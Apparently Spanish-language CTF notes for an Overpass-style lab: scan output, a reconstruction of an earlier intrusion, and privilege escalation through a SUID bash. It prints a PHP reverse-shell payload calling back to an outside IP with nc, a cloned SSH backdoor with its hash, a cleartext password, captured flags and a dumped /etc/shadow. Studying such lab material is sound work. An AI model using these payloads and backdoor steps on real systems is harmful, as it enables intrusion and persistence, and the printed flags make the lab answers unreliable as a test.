|       PRION:CVE-2021-28041    4.6     https://vulners.com/prion/PRION:CVE-2021-28041
|       CVE-2021-28041  4.6     https://vulners.com/cve/CVE-2021-28041
|       PRION:CVE-2021-41617    4.4     https://vulners.com/prion/PRION:CVE-2021-41617
|       CVE-2021-41617  4.4     https://vulners.com/cve/CVE-2021-41617
|       PRION:CVE-2020-14145    4.3     https://vulners.com/prion/PRION:CVE-2020-14145
|       PRION:CVE-2016-20012    4.3     https://vulners.com/prion/PRION:CVE-2016-20012
|       CVE-2020-14145  4.3     https://vulners.com/cve/CVE-2020-14145
|       CVE-2016-20012  4.3     https://vulners.com/cve/CVE-2016-20012
|       PRION:CVE-2021-36368    2.6     https://vulners.com/prion/PRION:CVE-2021-36368
|_      CVE-2021-36368  2.6     https://vulners.com/cve/CVE-2021-36368
MAC Address: 02:16:E2:7D:0B:07 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=2/13%OT=22%CT=1%CU=36502%PV=Y%DS=1%DC=D%G=Y%M=0216E2%T
OS:M=65CB718D%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10B%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M2301ST11NW7%O2=M2301ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11N
OS:W7%O5=M2301ST11NW7%O6=M2301ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F
OS:4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T
OS:=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R
OS:%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=
OS:40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0
OS:%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R
OS:=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.62 seconds


  

---------------- GOBUSTER     ------------------



VERIFICAMOS SI ESTABA LA RUTA QUE SUPUESTAMENTE TOMO EL ATACANTE ANTERIRORMENTE PARA SUBIR SU PAYLOAD Y NO ESTA /developmen/uploads/ SOLO ENCONTRAMOS ESTO:



┌──(root㉿kali)-[~]
└─# gobuster dir -u 10.10.217.114 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.217.114
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2024/02/13 13:51:21 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/aboutus              (Status: 301) [Size: 316] [--> http://10.10.217.114/aboutus/]
/css                  (Status: 301) [Size: 312] [--> http://10.10.217.114/css/]
/downloads            (Status: 301) [Size: 318] [--> http://10.10.217.114/downloads/]
/img                  (Status: 301) [Size: 312] [--> http://10.10.217.114/img/]
/index.html           (Status: 200) [Size: 815]
/server-status        (Status: 403) [Size: 278]
===============================================================
2024/02/13 13:51:22 Finished
===============================================================







*******************************************************************************************************************************
----------  RECREAMOS EN LIMPIO TODO LOS COMANDOS Y PASOS QUE REALIZO EL ATACANTE EN Y PARA NUESTRO SERVIDOR VICTIMA ----------







GET /developmen/uploads/payload.php   (PAYLOAD= <?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>)


id 


python3 -c 'import pty;pty.spawn("/bin/bash")'


ls -lAh


cat .overpass


su james  (Password: whenevernoteartinstant)


cd ~


sudo -l 


sudo cat /etc/shadow



git clone https://github.com/NinjaJc01/ssh-backdoor


cd ssh-backdoor


ssh-keygen     (nombre archivo: id_rsa)


chmod +x backdoor


./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed
<9d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed



(LA CONTRASEÑA DEL HASH QUE PASO AL BACKDOOR JUNTO CON EL SALT DEL SCRIPT ERA: november16 QUE SEGURAMENTE USO EL ATACANTE LUEGO PARA CONECTARSE POR SSH A ESTE BACKDOOR)


---------------------------------------------------------------------------------------------------------
*********************************************************************************************************





PROBAMOS CONECTARNOS CON LOS HASH Y SALT y password : november16 y bingo nos conectamos: 10.10.112.242 599bd7873bd4032d


┌──(root㉿kali)-[~]
└─# cat publickey.txt 
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05
                                                                                                                                     
┌──(root㉿kali)-[~]
└─# ssh -oHostKeyAlgorithms=+ssh-rsa -p 2222 -i publickey.txt james@10.10.217.114
The authenticity of host '[10.10.217.114]:2222 ([10.10.217.114]:2222)' can't be established.
RSA key fingerprint is SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.217.114]:2222' (RSA) to the list of known hosts.
james@10.10.217.114's password: 
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

james@overpass-production:/home/james/ssh-backdoor$ whoami
james
james@overpass-production:/home/james/ssh-backdoor$ sudo -l
[sudo] password for james: 
Sorry, try again.
[sudo] password for james: 
Sorry, try again.
[sudo] password for james: 
sudo: 2 incorrect password attempts
james@overpass-production:/home/james/ssh-backdoor$ sudo cat /etc/shadow
[sudo] password for james: 
Sorry, try again.
[sudo] password for james: 
sudo: 1 incorrect password attempt




NALIZANDO LOS ARCHIVOS CON BIT SUID ACTIVO ENCONTRAMOS UNO .SUID_BASH pero ejecutandolo ASI NOMAS SIN PARAMETROS NOS DA UNA SHELL PERO COMO JAMES, SOLO CONSEGUIMOS POR AHORA LA BANDERA DE JAMES USER:





james@overpass-production:/home/james/ssh-backdoor$ ls
README.md  backdoor.service  cooctus.png  id_rsa.pub  main.go
backdoor   build.sh          id_rsa       index.html  setup.sh
james@overpass-production:/home/james/ssh-backdoor$ cd ..
james@overpass-production:/home/james$ ls
ssh-backdoor  user.txt  www
james@overpass-production:/home/james$ cat user.txt 
thm{d119b4fa8c497ddb0525f7ad200e6567}



BUSCAMOS ARCHIVOS BIT SUID ACTIVOS:


james@overpass-production:/home$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/at
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/bin/mount
/bin/fusermount
/bin/su
/bin/ping
/bin/umount
/home/james/.suid_bash




DESCUBRIMOS EN OBCIONES QEU TENIA EL ARCHIVO .SUID_BASH DENTRO LEGIBLES Y SALIA UN PARAMETRO -p PARA EJECUTARLO JUNTO CON EL EN LA LINEA DE COMANDO PARA ESPECIFICARLE QUE TENGA ACCESO A TODAS LAS RUTAS DEL $PATH Y BINGO SE TENZO CONSEGUIMOS SER ROOT    :D  :






james@overpass-production:/home/james$ ./.suid_bash -p       
.suid_bash-4.4# whoami
root


.suid_bash-4.4# cd /root
.suid_bash-4.4# ls
root.txt
.suid_bash-4.4# cat root.txt 
thm{d53b2684f169360bb9606c333873144d}






LUEGO ANALIZANDO BIREN EL SCRIPT CON BIT SUID VIMOS LOS PARAMETROS PARA MANEJARLO POR LINEA DE COMANDO Y HASTA LOGRAMOS SOLO EJECUTAR COMANDOS COMO ROOT CON EL SIN OPTENER DIRECTAMENTE LA SHELL; LO PROBAMOS POARA COMPRENDER MEJOR EL SCRIPT: 






james@overpass-production:/home/james$ ./.suid_bash -c whoami
james
james@overpass-production:/home/james$ ./.suid_bash -p -c whoami
root
james@overpass-production:/home/james$ ./.suid_bash -p -c cat /etc/shadow
^C
james@overpass-production:/home/james$ ./.suid_bash -p -c "cat /etc/shadow"
root:*:18295:0:99999:7:::
daemon:*:18295:0:99999:7:::
bin:*:18295:0:99999:7:::
sys:*:18295:0:99999:7:::
sync:*:18295:0:99999:7:::
games:*:18295:0:99999:7:::
man:*:18295:0:99999:7:::
lp:*:18295:0:99999:7:::
mail:*:18295:0:99999:7:::
news:*:18295:0:99999:7:::
uucp:*:18295:0:99999:7:::
proxy:*:18295:0:99999:7:::
www-data:*:18295:0:99999:7:::
backup:*:18295:0:99999:7:::
list:*:18295:0:99999:7:::
irc:*:18295:0:99999:7:::
gnats:*:18295:0:99999:7:::
nobody:*:18295:0:99999:7:::
systemd-network:*:18295:0:99999:7:::
systemd-resolve:*:18295:0:99999:7:::
syslog:*:18295:0:99999:7:::
messagebus:*:18295:0:99999:7:::
_apt:*:18295:0:99999:7:::
lxd:*:18295:0:99999:7:::
uuidd:*:18295:0:99999:7:::
dnsmasq:*:18295:0:99999:7:::
landscape:*:18295:0:99999:7:::
pollinate:*:18295:0:99999:7:::
sshd:*:18464:0:99999:7:::
james:$6$o23rmAtq$FabncpS1b85LDz9DfBShXj.hJXYIcGf1KdKJZP/3x3bGUJpP6Kvfc0JT8IkDaLbImCPGRPMUgXtA2NHLu8DEp1:18464:0:99999:7:::
paradox:$6$FVl2Uugb$TGpvNxRQWDYpK/lj505LDgdcrMCMN2e4c5MJ.YhVoZY7bRNwAZ2S24XapBm/s5s59tfrc4528tvrlJoNpJI2i0:18464:0:99999:7:::
szymex:$6$VwSYCytA$f.OYSpSkouPHPxd..Y3.Kdtm0P/Dc1lmHn722NO6.tj39r87KtOx7L0lIlJxYoDChkN4q/93cXg3MIMDZSPD00:18464:0:99999:7:::
bee:$6$ebKaOMGO$Pe7KvyDzaLctd1.SRSdiud.VSmokU5/Fla4VnDpNVMtk6TKmHcxb3kyGcUcFv89YTq9LuwoYtmnXLKz/X2Yu9.:18464:0:99999:7:::
muirland:$6$nESmZyzG$IcXb5muWfGIMK3ZsZa7Ml/DvQGTTzK8P.XKnCeRlPjP13shRrSjGnSQFCXhWOR.6It.VTLNOQnQt9pU.klTBu.:18464:0:99999:7:::
james@overpass-production:/home/james$ ./.suid_bash -p -O                  
autocd          off
cdable_vars     off
cdspell         off
checkhash       off
checkjobs       off
checkwinsize    off
cmdhist         on
compat31        off
compat32        off
compat40        off
compat41        off
compat42        off
compat43        off
complete_fullquote on
direxpand       off
dirspell        off
dotglob         off
execfail        off
expand_aliases  off
extdebug        off
extglob         off
extquote        on
failglob        off
force_fignore   on
globasciiranges off
globstar        off
gnu_errfmt      off
histappend      off
histreedit      off
histverify      off
hostcomplete    on
huponexit       off
inherit_errexit off
interactive_comments on
lastpipe        off
lithist         off
login_shell     off
mailwarn        off
no_empty_cmd_completion off
nocaseglob      off
nocasematch     off
nullglob        off
progcomp        on
promptvars      on
restricted_shell off
shift_verbose   off
sourcepath      on
xpg_echo        off
.suid_bash-4.4# exit
exit